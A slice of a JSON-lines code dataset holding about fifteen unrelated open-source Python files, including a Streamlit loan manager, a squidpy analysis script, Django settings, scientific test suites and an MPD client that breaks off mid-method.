'Update Prestamo', 'Delete Prestamo']\n operation = st.selectbox('Select operation:', prestamo_operations)\n \n if operation == 'Create Prestamo':\n # Collect the data for the new prestamo\n today = date.today()\n user_id = st.session_state.usuario \n book_id = st.selectbox('Select book:', get_libros())\n loan_date = st.date_input('Loan Date:', min_value=today)\n return_date = st.date_input('Return Date:')\n \n create_prestamo_button = st.button(\"Confirm Creation\")\n if create_prestamo_button:\n create_prestamo(user_id=user_id, book_id=book_id, loan_date=loan_date.isoformat(), return_date=return_date.isoformat())\n \n elif operation == 'Update Prestamo':\n # Retrieve the list of prestamos\n prestamos = get_prestamos()\n # Create a dropdown menu to select the prestamo to update\n prestamo_to_update = st.selectbox('Select prestamo to update:', prestamos)\n # Call the update_prestamo_form function with the selected prestamo\n update_prestamo_button = st.button(\"Get form\")\n \n if update_prestamo_button:\n print(ObjectId(prestamo_to_update['_id']))\n update_prestamo_form(prestamo_id=ObjectId(prestamo_to_update['_id']))\n \n elif operation == 'Delete Prestamo':\n # Retrieve the list of prestamos\n prestamos = get_prestamos()\n # Create a dropdown menu to select the prestamo to delete\n prestamo_to_delete = st.selectbox('Select prestamo to delete:', prestamos)\n # Call the delete_prestamo function with the selected prestamo\n delete_prestamo_button = st.button(\"Confirm Deletion\")\n \n if delete_prestamo_button:\n delete_prestamo(prestamo_id=prestamo_to_delete['_id'])\n","repo_name":"JEMata16/ProyectoBDNoSQL","sub_path":"prestamos.py","file_name":"prestamos.py","file_ext":"py","file_size_in_byte":4457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"2716111418","text":"# Limpando a tela\nimport os\nos.system(\"clear\")\n\n# Calculando o ano em que alguém nasceu\nidade = int(input(\"Quantos anos você completará/completou esse ano? \"))\nprint(\"Você nasceu no ano de:\",2018 - idade,end=\"\\n\\n\")\n\n# Convertendo sua idade em dias\nidade = int(input(\"Qual sua idade? \"))\nprint(\"Sua idade em dias é:\",idade * 365,end=\"\\n\\n\")\n\n# Vivo a tantas horas\nidade = int(input(\"Qual sua idade? \"))\nprint(\"Você está vivo(a) há:\",idade*365*24,\"horas.\")","repo_name":"sylviocesart/curso_python","sub_path":"Ignorância_Zero/aula07/idade.py","file_name":"idade.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"40383737396","text":"class students:\n __test = \"hello\"\n def __init__(self,age, name = \"student\"):\n self.age = age\n self.name = name\n \n\n\n \n\n def avgscore(self,score_1,score_2,score_3):\n return (score_1 + score_2 + score_3)/3\n\nstudent1 = students(25,)\nprint(student1.avgscore(20,40,60))\nprint(getattr(student1,\"name\"))\nstudent2 = students(25,\"bill\")\nprint(student2._students__test)\n","repo_name":"MattCrutchley/python_excersises","sub_path":"applications/oop.py","file_name":"oop.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"15328682134","text":"range(100) # is a generator – special type\ndef make_list(num):\n result = []\n for i in range(num): # Generator is not held in memory\n result += [i*2]\n return result\n\nmy_list = make_list(20000000) # we wait till list takes up the space and creates, range does not need that\nprint('done')\n ","repo_name":"estle/Python-zero-to-mastery","sub_path":"10 Advanced Python Generators/162 Generators.py","file_name":"162 Generators.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"41541736747","text":"\"\"\"\nTrying the squidpy implimentation of cpdb, since from the API\nFollowing tutorial here:\nhttps://squidpy.readthedocs.io/en/latest/auto_examples/graph/compute_ligrec.html\n\n INPUT: * /Volumes/GML001-Q1851/Brad/breast_ClusterCCIResults.h5ad\n OUTPUT: * data/breast/cluster/\n\"\"\"\n\n################################################################################\n # Environment setup #\n################################################################################\nwork_dir = '/Users/uqbbalde/Desktop/Uni_Studies/projects/stLearn/'\n\nimport os\nos.chdir(work_dir)\n\nimport numpy as np\nimport pandas as pd\nimport scanpy as sc\nimport squidpy as sq\n\ndata_dir = '/Volumes/GML001-Q1851/Brad/'\nout_dir = 'data/breast/cluster/'\n\n################################################################################\n # Loading the data #\n################################################################################\ndata = sc.read_h5ad(data_dir+'breast_ClusterCCIResults.h5ad')\n\n################################################################################\n # Running squidpy #\n################################################################################\nresult = sq.gr.ligrec(data, n_perms=1000, cluster_key=\"cell_type\",\n copy=True, use_raw=False,\n show_progress_bar = True,\n corr_method='fdr_bh', corr_axis='clusters',\n )\npvals = pd.DataFrame(result['pvalues'])\n\n################################################################################\n # Creating a CCI interaction matrix equivalent to other methods #\n################################################################################\ncci_names = np.array([col[0]+'--'+col[1] for col in pvals.columns])\ncell_type_set = np.unique([col[0] for col in pvals.columns])\nint_matrix = np.zeros((len(cell_type_set), len(cell_type_set)))\nfor i, row in enumerate(pvals.index):\n lr_ = '_'.join(list(row))\n\n # Getting sig CCIs for this lr #\n lr_pvals = np.array(pvals.values[i,:])\n sig_bool = lr_pvals < .05\n lr_ccis = cci_names[sig_bool]\n for j, cci in enumerate(lr_ccis):\n c1, c2 = cci.split('--')\n row = np.where(cell_type_set==c1)[0][0]\n col = np.where(cell_type_set==c2)[0][0]\n int_matrix[row,col] += 1\n\nint_df = pd.DataFrame(int_matrix, index=cell_type_set, columns=cell_type_set)\n\nint_df.to_csv(out_dir+'squidpy_ints.txt', sep='\\t', header=True)\n\n","repo_name":"BiomedicalMachineLearning/stlearn_manuscript","sub_path":"Main_figure_4_5_CCI_with_Sup/scripts/X2_method_comp_clusters/X6_squidpy_cpdb_cluster.py","file_name":"X6_squidpy_cpdb_cluster.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"6984807684","text":"import glob\nimport logging\nimport os\nfrom argparse import Namespace\n\nfrom exceptions.pymage_exceptions import NotAbleToDownloadException\nfrom parsers.parser_factory import ParserFactory\nfrom utils.utils import download_images\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass Downloader:\n\n def __init__(self, filename_pattern: str):\n\n if \"%s\" not in filename_pattern:\n raise ValueError(\"'%s' placeholder not found in filename_pattern and it is needed for duplicate detection.\")\n\n self.filename_pattern = filename_pattern\n\n self.parser = None\n self.args = None\n\n def download(self, args: Namespace):\n\n self.args = args\n self.parser = ParserFactory.get_parser(args.url)\n\n if not self.parser:\n raise NotImplementedError(f\"No parser was found to download from {args.url}\")\n\n LOGGER.info(f\"Downloading images from {self.args.url}\")\n\n try:\n images = self.parser.get_images(self.args.url)\n images = self._filter_existent_images(images)\n download_images(images, self.args.folder)\n\n except NotAbleToDownloadException as e:\n LOGGER.error(e)\n\n LOGGER.info(\"The downloader is done!\")\n\n def _filter_existent_images(self, images: list) -> list:\n new_images = []\n\n for i in images:\n\n pattern_to_search = self.filename_pattern % i.post_id\n pattern_to_search = os.path.join(self.args.folder, pattern_to_search)\n LOGGER.debug(\"Pattern to search: %s\" % pattern_to_search)\n\n if not self.args.should_overwrite and len(glob.glob(pattern_to_search)) > 0:\n LOGGER.info(f\"Skipping post {i.post_id}, we already have its images...\")\n continue\n new_images.append(i)\n\n return new_images\n","repo_name":"CharlieCorner/pymage_downloader","sub_path":"downloaders/downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"33608461466","text":"import re\nfrom pathlib import Path\n\nfrom setuptools import setup\n\nwith open(Path(\"fastapi_sqlalchemy\") / \"__init__.py\", encoding=\"utf-8\") as fh:\n version = re.search(r'__version__ = \"(.*?)\"', fh.read(), re.M).group(1)\n\nwith open(\"README.rst\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nsetup(\n name=\"FastAPI-SQLAlchemy\",\n version=version,\n url=\"https://github.com/mfreeborn/fastapi-sqlalchemy\",\n project_urls={\n \"Code\": \"https://github.com/mfreeborn/fastapi-sqlalchemy\",\n \"Issue tracker\": \"https://github.com/mfreeborn/fastapi-sqlalchemy/issues\",\n },\n license=\"MIT\",\n author=\"Michael Freeborn\",\n author_email=\"michaelfreeborn1@gmail.com\",\n description=\"Adds simple SQLAlchemy support to FastAPI\",\n long_description=long_description,\n packages=[\"fastapi_sqlalchemy\"],\n package_data={\"fastapi_sqlalchemy\": [\"py.typed\"]},\n zip_safe=False,\n python_requires=\">=3.7\",\n install_requires=[\"starlette>=0.12.9\", \"SQLAlchemy>=1.2\"],\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Environment :: Web Environment\",\n \"Framework :: AsyncIO\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3 :: Only\",\n \"Programming Language :: Python :: Implementation :: CPython\",\n \"Topic :: Internet :: WWW/HTTP :: HTTP Servers\",\n \"Topic :: Internet :: WWW/HTTP :: Dynamic Content\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n ],\n)\n","repo_name":"mfreeborn/fastapi-sqlalchemy","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":548,"dataset":"github-code","pt":"82"} +{"seq_id":"4624362272","text":"class Solution(object):\n def replaceElements(self, arr):\n curMax = 0\n result = []\n for i in reversed(range(len(arr))):\n if i == len(arr) -1:\n curMax = arr[i]\n result = [-1]\n else:\n result = [curMax] + result\n if arr[i] > curMax:\n curMax = arr[i]\n \n return result","repo_name":"chinatip/problem-solving","sub_path":"leetCode/array/easy/replace-elements-with-greatest-element-on-right-side.py","file_name":"replace-elements-with-greatest-element-on-right-side.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"1384803345","text":"import sys\nfrom PyQt5.QtWidgets import QApplication\nfrom gui import ScraperApp \n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n window = ScraperApp()\n\n window.setStyleSheet(\"background-color: #F5F5F5;\")\n window.setFixedSize(400, 300) # Adjust the size as per your preference\n\n window.show()\n sys.exit(app.exec_())\n","repo_name":"MuLIAICHI/Car-Scraper","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"13620628891","text":"\"\"\"\n给定一副牌 判断是否和牌 (川麻基本牌型 没有风 不考虑七小对 十三幺等特殊牌型 考虑杠)\n输入点数按照升序排列\n\"\"\"\nfrom typing import List, Tuple\n\n\ndef check_one_type(cards: List[int]) -> Tuple[bool, int, int]:\n length = len(cards)\n if length == 0:\n return True, 0, 0\n if length == 1:\n return False, -1, -1\n if length == 2:\n if cards[0] == cards[-1]:\n return True, 1, 0\n else:\n return False, -1, -1\n if length == 3:\n if cards[0] == cards[-1] or (cards[0] + 1 == cards[1] and cards[1] + 1 == cards[2]):\n return True, 0, 1\n else:\n return False, 0, 0\n if length == 4:\n if cards[0] == cards[-1]:\n return True, 0, 1\n else:\n return False, 0, 0\n for i in [2, 3, 4]:\n status, jiang_nums, shunzi_nums = check_one_type(cards[:i])\n if status:\n rest_status, rest_jiang, rest_shunzi = check_one_type(cards[i:])\n if rest_status:\n return True, jiang_nums + rest_jiang, shunzi_nums + rest_shunzi\n return False, -1, -1\n\n\ndef has_win(bings: List[int], tiaos: List[int], wans: List[int]):\n jiang_nums = 0\n shunzi_nums = 0\n for cards in [bings, tiaos, wans]:\n status, sub_jiang, sub_shunzi = check_one_type(cards)\n if not status:\n return False\n jiang_nums += sub_jiang\n shunzi_nums += sub_shunzi\n return jiang_nums == 1 and shunzi_nums == 4\n\n\nif __name__ == '__main__':\n bings = []\n wans = [1, 1, 1, 1, 2, 3, 4, 5, 6]\n tiaos = [4, 5, 6, 7, 7]\n print(has_win(bings, tiaos, wans))","repo_name":"ustczyb/py-leetcode","sub_path":"custom/mah-jong_1.py","file_name":"mah-jong_1.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"3116248916","text":"\"\"\"Tests for 2d flow around a cylinder with shifted boundary method on a 3D mesh\"\"\"\nfrom builtins import range\nfrom builtins import object\nfrom proteus.iproteus import *\nfrom proteus import Comm, defaults\nfrom proteus import Context\nimport tables\nimport importlib\n\n\ncomm = Comm.get()\nProfiling.logLevel = 7\nProfiling.verbose = False\nimport numpy as np\n\nmodulepath = os.path.dirname(os.path.abspath(__file__))\n\nclass Test_sbm_cylinder2D_on_mesh3D(object):\n\n @classmethod\n def setup_class(cls):\n cls._scriptdir = os.path.dirname(os.path.abspath(__file__))\n @classmethod\n def teardown_class(cls):\n pass\n\n def setup_method(self, method):\n pass\n\n def teardown_method(self, method):\n \"\"\" Tear down function \"\"\"\n FileList = ['cylinder_sbm_mesh3D_T001_P1_sbm_3Dmesh.h5', 'cylinder_sbm_mesh3D_T001_P1_sbm_3Dmesh.xmf',\n ]\n for file in FileList:\n if os.path.isfile(file):\n os.remove(file)\n else:\n pass\n\n\n\n def test_ex1(self):\n self.compare_name = \"T001_P1_sbm_3Dmesh\"\n self.example_setting(\"T=0.01 spaceOrder=1 onlySaveFinalSolution=True\")\n self.teardown_method(self)\n\n # really slow\n# def test_ex2(self):\n# self.compare_name = \"T001_P2_sbm_3Dmesh\"\n# self.example_setting(\"T=0.01 spaceOrder=2 onlySaveFinalSolution=True\")\n\n\n def example_setting(self, pre_setting):\n Context.contextOptionsString = pre_setting\n\n my_so = defaults.load_system(\"cylinder_so\",modulepath)\n\n opts.profile = False\n opts.gatherArchive = True\n \n pList=[]\n nList=[]\n sList=[]\n for (pModule,nModule) in my_so.pnList:\n pList.append(defaults.load_physics(pModule,modulepath))\n nList.append(defaults.load_numerics(nModule,modulepath))\n if pList[-1].name == None:\n pList[-1].name = pModule\n\n if my_so.sList == []:\n for i in range(len(my_so.pnList)):\n s = default_s\n sList.append(s)\n else:\n sList = my_so.sList\n\n my_so.name += \"_sbm_mesh3D_\"+self.compare_name #save data with different filename\n try:\n ns = proteus.NumericalSolution.NS_base(my_so,\n pList,\n nList,\n sList,\n opts)\n except:\n assert 0, \"NS setup failed\"\n try:\n ns.calculateSolution(my_so.name)\n except:\n assert 0, \"NS calculation failed\"\n\n actual = tables.open_file('cylinder_sbm_mesh3D_T001_P1_sbm_3Dmesh'+'.h5','r')\n expected_path = 'comparison_files/' + 'comparison_u_t2.csv'\n #write comparison file\n #np.array(actual.root.u_t2).tofile(os.path.join(self._scriptdir, expected_path),sep=\",\")\n np.testing.assert_almost_equal(np.fromfile(os.path.join(self._scriptdir, expected_path),sep=\",\"),np.array(actual.root.u_t2),decimal=10)\n\n actual.close()\n","repo_name":"erdc/proteus","sub_path":"proteus/tests/cylinder2D/sbm_3Dmesh/test_cylinder2D_on_3D_mesh_sbm.py","file_name":"test_cylinder2D_on_3D_mesh_sbm.py","file_ext":"py","file_size_in_byte":3127,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"82"} +{"seq_id":"18245796145","text":"from typing import List, Dict\n\n\nclass TreeStore:\n\n def __init__(self, items: List[Dict]):\n _items = {} # Для прямого доступа по айди\n _nodes = {} # Для хранения дочерних элементов узла\n\n # Создание корневого узла\n root_item = items[0]\n _nodes[root_item['id']] = []\n _items[root_item['id']] = root_item\n\n for item in items[1:]:\n _nodes[item['id']] = []\n _nodes[item['parent']].append(item['id'])\n _items[item['id']] = item\n\n self._nodes = _nodes\n self._items = _items\n\n def getAll(self) -> List[Dict]:\n # Перебирается только список элементов, сложность O(n), можно было просто сохранить исходный список, но наверное это не подразумевалось\n return list(self._items.values())\n\n def getItem(self, item_id) -> Dict:\n # Обращение напрямую, сложность O(1)\n return self._items[item_id]\n\n def getChildren(self, item_id: int) -> List:\n # сложность O(n), можно было хранить в узлах сами элемнты, тогда было бы O(1) в ущерб памяти\n return [self._items[i] for i in self._nodes[item_id]]\n\n def getAllParents(self, item_id: int) -> List:\n # Сложность O(n + 1), где n - кол-во родительских узлов\n item = self._items[item_id]\n if item['parent'] == 'root':\n return []\n parent_id = item['parent']\n return [self._items[parent_id]] + self.getAllParents(parent_id)\n\nexample_items = [\n {\"id\": 1, \"parent\": \"root\"},\n {\"id\": 2, \"parent\": 1, \"type\": \"test\"},\n {\"id\": 3, \"parent\": 1, \"type\": \"test\"},\n {\"id\": 4, \"parent\": 2, \"type\": \"test\"},\n {\"id\": 5, \"parent\": 2, \"type\": \"test\"},\n {\"id\": 6, \"parent\": 2, \"type\": \"test\"},\n {\"id\": 7, \"parent\": 4, \"type\": None},\n {\"id\": 8, \"parent\": 4, \"type\": None},\n]\nts = TreeStore(example_items)\n\n# Примеры использования:\nprint(ts.getAll() == example_items)\n\nprint(ts.getItem(7) == {\"id\": 7, \"parent\": 4, \"type\": None})\n#\nprint(ts.getChildren(4) == [{\"id\": 7, \"parent\": 4, \"type\": None},\n {\"id\": 8, \"parent\": 4, \"type\": None}])\nprint(ts.getChildren(5) == [])\n#\nprint(ts.getAllParents(7) == [{\"id\": 4, \"parent\": 2, \"type\": \"test\"},\n {\"id\": 2, \"parent\": 1, \"type\": \"test\"},\n {\"id\": 1, \"parent\": \"root\"}])\n","repo_name":"nurdermind/test_work_nodes","sub_path":"three_store.py","file_name":"three_store.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"32438418977","text":"# -*- coding: utf-8 -*-\n#\n# Authors: Alexandre Gramfort \n# Eric Larson \n# Joan Massich \n# Guillaume Favelier \n# Oleh Kozynets \n#\n# License: Simplified BSD\n\nimport pytest\nimport numpy as np\nimport os.path as path\nfrom mne import read_source_estimate\nfrom mne.datasets import testing\nfrom mne.viz._brain import _Brain\nfrom mne.viz._brain.colormap import calculate_lut\n\nfrom matplotlib import cm\n\ndata_path = testing.data_path(download=False)\nsubject_id = 'sample'\nsubjects_dir = path.join(data_path, 'subjects')\nfname_stc = path.join(data_path, 'MEG/sample/sample_audvis_trunc-meg')\nfname_label = path.join(data_path, 'MEG/sample/labels/Vis-lh.label')\nsurf = 'inflated'\n\n\n@testing.requires_testing_data\ndef test_brain_init(renderer):\n \"\"\"Test initialization of the _Brain instance.\"\"\"\n hemi = 'both'\n\n with pytest.raises(ValueError, match='size'):\n _Brain(subject_id=subject_id, hemi=hemi, surf=surf, size=0.5)\n with pytest.raises(TypeError, match='figure'):\n _Brain(subject_id=subject_id, hemi=hemi, surf=surf, figure='foo')\n with pytest.raises(ValueError, match='interaction'):\n _Brain(subject_id=subject_id, hemi=hemi, surf=surf, interaction=0)\n with pytest.raises(KeyError):\n _Brain(subject_id=subject_id, hemi='foo', surf=surf)\n\n _Brain(subject_id, hemi, surf, size=(300, 300),\n subjects_dir=subjects_dir)\n\n\n@testing.requires_testing_data\ndef test_brain_screenshot(renderer):\n \"\"\"Test screenshot of a _Brain instance.\"\"\"\n brain = _Brain(subject_id, hemi='both', size=600,\n surf=surf, subjects_dir=subjects_dir)\n img = brain.screenshot(mode='rgb')\n assert(img.shape == (600, 600, 3))\n\n\n@testing.requires_testing_data\ndef test_brain_add_data(renderer):\n \"\"\"Test adding data in _Brain instance.\"\"\"\n stc = read_source_estimate(fname_stc)\n\n hemi = 'lh'\n hemi_data = stc.data[:len(stc.vertices[0]), 10]\n hemi_vertices = stc.vertices[0]\n fmin = stc.data.min()\n fmax = stc.data.max()\n\n brain_data = _Brain(subject_id, hemi, surf, size=300,\n subjects_dir=subjects_dir)\n\n with pytest.raises(ValueError, match='thresh'):\n brain_data.add_data(hemi_data, thresh=-1)\n with pytest.raises(ValueError, match='remove_existing'):\n brain_data.add_data(hemi_data, remove_existing=-1)\n with pytest.raises(ValueError, match='time_label_size'):\n brain_data.add_data(hemi_data, time_label_size=-1)\n with pytest.raises(ValueError, match='scale_factor'):\n brain_data.add_data(hemi_data, scale_factor=-1)\n with pytest.raises(ValueError, match='vector_alpha'):\n brain_data.add_data(hemi_data, vector_alpha=-1)\n with pytest.raises(ValueError):\n brain_data.add_data(array=np.array([0, 1, 2]))\n with pytest.raises(ValueError):\n brain_data.add_data(hemi_data, fmin=fmin, hemi=hemi,\n fmax=fmax, vertices=None)\n\n brain_data.add_data(hemi_data, fmin=fmin, hemi=hemi, fmax=fmax,\n colormap='hot', vertices=hemi_vertices,\n colorbar=False, time=None)\n brain_data.add_data(hemi_data, fmin=fmin, hemi=hemi, fmax=fmax,\n colormap='hot', vertices=hemi_vertices,\n initial_time=0., colorbar=True, time=None)\n\n\n@testing.requires_testing_data\ndef test_brain_add_label(renderer):\n \"\"\"Test adding data in _Brain instance.\"\"\"\n from mne.label import read_label\n brain = _Brain(subject_id, hemi='lh', size=500,\n surf=surf, subjects_dir=subjects_dir)\n label = read_label(fname_label)\n brain.add_label(fname_label)\n brain.add_label(label)\n\n\n@testing.requires_testing_data\ndef test_brain_add_foci(renderer):\n \"\"\"Test adding foci in _Brain instance.\"\"\"\n brain = _Brain(subject_id, hemi='lh', size=500,\n surf=surf, subjects_dir=subjects_dir)\n brain.add_foci([0], coords_as_verts=True,\n hemi='lh', color='blue')\n\n\n@testing.requires_testing_data\ndef test_brain_add_text(renderer):\n \"\"\"Test adding text in _Brain instance.\"\"\"\n brain = _Brain(subject_id, hemi='lh', size=250,\n surf=surf, subjects_dir=subjects_dir)\n brain.add_text(x=0, y=0, text='foo')\n\n\ndef test_brain_colormap():\n \"\"\"Test brain's colormap functions.\"\"\"\n colormap = \"coolwarm\"\n alpha = 1.0\n fmin = 0.0\n fmid = 0.5\n fmax = 1.0\n center = None\n calculate_lut(colormap, alpha=alpha, fmin=fmin,\n fmid=fmid, fmax=fmax, center=center)\n center = 0.0\n colormap = cm.get_cmap(colormap)\n calculate_lut(colormap, alpha=alpha, fmin=fmin,\n fmid=fmid, fmax=fmax, center=center)\n","repo_name":"mpoziomska/MNE","sub_path":"mne/viz/_brain/tests/test_brain.py","file_name":"test_brain.py","file_ext":"py","file_size_in_byte":4838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"4763360126","text":"'''\nj - i != nums[j] - nums[i]\n\nnums[j] - j != nums[i] - i\n[4,1,3,3]\n[0,1,2,3]\n\n[4,0,1,0]\n\n'''\nclass Solution:\n def countBadPairs(self, nums: List[int]) -> int:\n # O(n) / O(n)\n nums2 = [num - i for i, num in enumerate(nums)]\n \n dic = defaultdict(int)\n for i, num in enumerate(nums2):\n dic[num] += 1\n \n res = len(nums) * (len(nums) - 1) // 2\n for val, cnt in dic.items():\n res -= cnt * (cnt - 1) // 2\n \n return res","repo_name":"KOPFYF/LCEveryday","sub_path":"Hash Table & Prefix Sum/countBadPairs2364.py","file_name":"countBadPairs2364.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"75048007627","text":"\"\"\"\nDjango settings for hebrew_order_david project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\nAUTH_USER_MODEL = 'accounts.User'\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = os.environ.get('SECRET_KEY', str(os.urandom(32)))\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = bool(os.environ.get('DEBUG', True))\n\nTEMPLATE_DEBUG = bool(os.environ.get('DEBUG', True))\n\nALLOWED_HOSTS = ['*']\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django_admin_bootstrapped',\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'application',\n 'bootstrap3',\n 'accounts',\n 'core',\n 'djangoformsetjs'\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'hebrew_order_david.urls'\n\nWSGI_APPLICATION = 'hebrew_order_david.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'hebrew_order_david',\n 'HOST': 'localhost',\n 'USER': 'postgres',\n 'PASSWORD': '',\n 'PORT': '5432'\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'America/Chicago'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\n\nSTATIC_URL = '/static/'\n\nDAB_FIELD_RENDERER = 'django_admin_bootstrapped.renderers.BootstrapFieldRenderer'\n\nfrom django.contrib import messages\n\nMESSAGE_TAGS = {\n messages.SUCCESS: 'alert-success success',\n messages.WARNING: 'alert-warning warning',\n messages.ERROR: 'alert-danger error'\n}\n\nTEMPLATE_DIRS = (os.path.join(os.path.split(BASE_DIR)[0], 'core', 'templates'),)\n\n# email credentials\nEMAIL_FROM = os.environ.get('EMAIL_FROM', 'test@test.com')\nEMAIL_HOST_USER = os.environ.get('EMAIL_HOST_USER', None)\nEMAIL_HOST_PASSWORD = os.environ.get('EMAIL_HOST_PASSWORD', None)\nEMAIL_HOST = os.environ.get('EMAIL_HOST', None)\n\n# for testing in development\nif not EMAIL_HOST:\n EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\n\n# for heroku deployment\nif os.environ.get('DATABASE_URL'):\n\n # Parse database configuration from $DATABASE_URL\n import dj_database_url\n DATABASES['default'] = dj_database_url.config()\n\n # Honor the 'X-Forwarded-Proto' header for request.is_secure()\n SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')\n\n STATIC_ROOT = 'staticfiles'\n\n STATICFILES_DIRS = (\n os.path.join(BASE_DIR, 'static'),\n )\n","repo_name":"dhosterman/hebrew_order_david","sub_path":"hebrew_order_david/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"40265474315","text":"import socket\nimport re\nimport json\nimport functools\n\ndef asjson(f):\n\t\"\"\"Decorator: convert result to JSON.\"\"\"\n\t@functools.wraps(f)\n\tdef wrapped(*args, **kwargs):\n\t\treturn json.dumps(f(*args, **kwargs))\n\treturn wrapped\n\ndef statusasjson(f):\n\t\"\"\"Decorator: discard result, return status() as JSON instead.\"\"\"\n\t@functools.wraps(f)\n\tdef wrapped(*args, **kwargs):\n\t\tf(*args, **kwargs)\n\t\treturn json.dumps(status())\n\treturn wrapped\n\nclass MPC:\n\tdef __init__(self, host = \"localhost\", port = 6600):\n\t\t\"\"\"Initialize connection.\"\"\"\n\t\tself.__sock = socket.create_connection( (host, port), None )\n\t\tself.__file = self.__sock.makefile()\n\t\t\n\t\tself.__completionRE = re.compile(\"^(OK|ACK)\")\n\t\tself.__initRE = re.compile(\"^OK MPD ([0-9.]+)$\")\n\t\tself.__errorRE = re.compile(\"^ACK \\[(\\d*)@(\\d*)\\] {([^}]*)} (.*)$\")\n\t\tself.__assignmentRE = re.compile(\"^(.*?):\\s*(.*)$\")\n\t\tself.__version = None\n\t\t\n\t\t# read init sequence\n\t\tline = self.read()\n\t\tm = self.__initRE.match(line)\n\t\tif m != None:\n\t\t\tself.__version = m.group(1)\n\n\tdef send(self, cmd):\n\t\t\"\"\"Send a command to server.\"\"\"\n\t\tself.__file.write(cmd + \"\\n\")\n\t\tself.__file.flush()\t\n\t\n\tdef read(self):\n\t\t\"\"\"Read one line from server.\"\"\"\n\t\twhile True:\n\t\t\tres = self.__file.readline().strip()\n\t\t\tif len(res) > 0: \n\t\t\t\treturn res\n\t\n\tdef dumpResult(self, cmd):\n\t\t\"\"\"Execute command and dump full output.\"\"\"\n\t\tself.send(cmd)\n\t\twhile True:\n\t\t\tline = self.read()\n\t\t\tprint(\"> \" + line)\n\t\t\tif self.__completionRE.match(line) != None:\n\t\t\t\tbreak\n\t\n\tdef returnStatus(self, line, res, rest):\n\t\t\"\"\"Parse last line and return actual result tuple.\"\"\"\n\t\tif line == \"OK\":\n\t\t\treturn (\"OK\", res, rest)\n\t\t\t\n\t\tm = self.__errorRE.match(line)\n\t\tif m != None:\n\t\t\treturn (\"ERROR\", {\"error\": m.group(1), \"atcmd\": m.group(2), \"cmd\": m.group(3), \"msg\": m.group(4)})\n\t\t\n\t\treturn (\"UNKOWN\", res, rest)\n\t\n\tdef 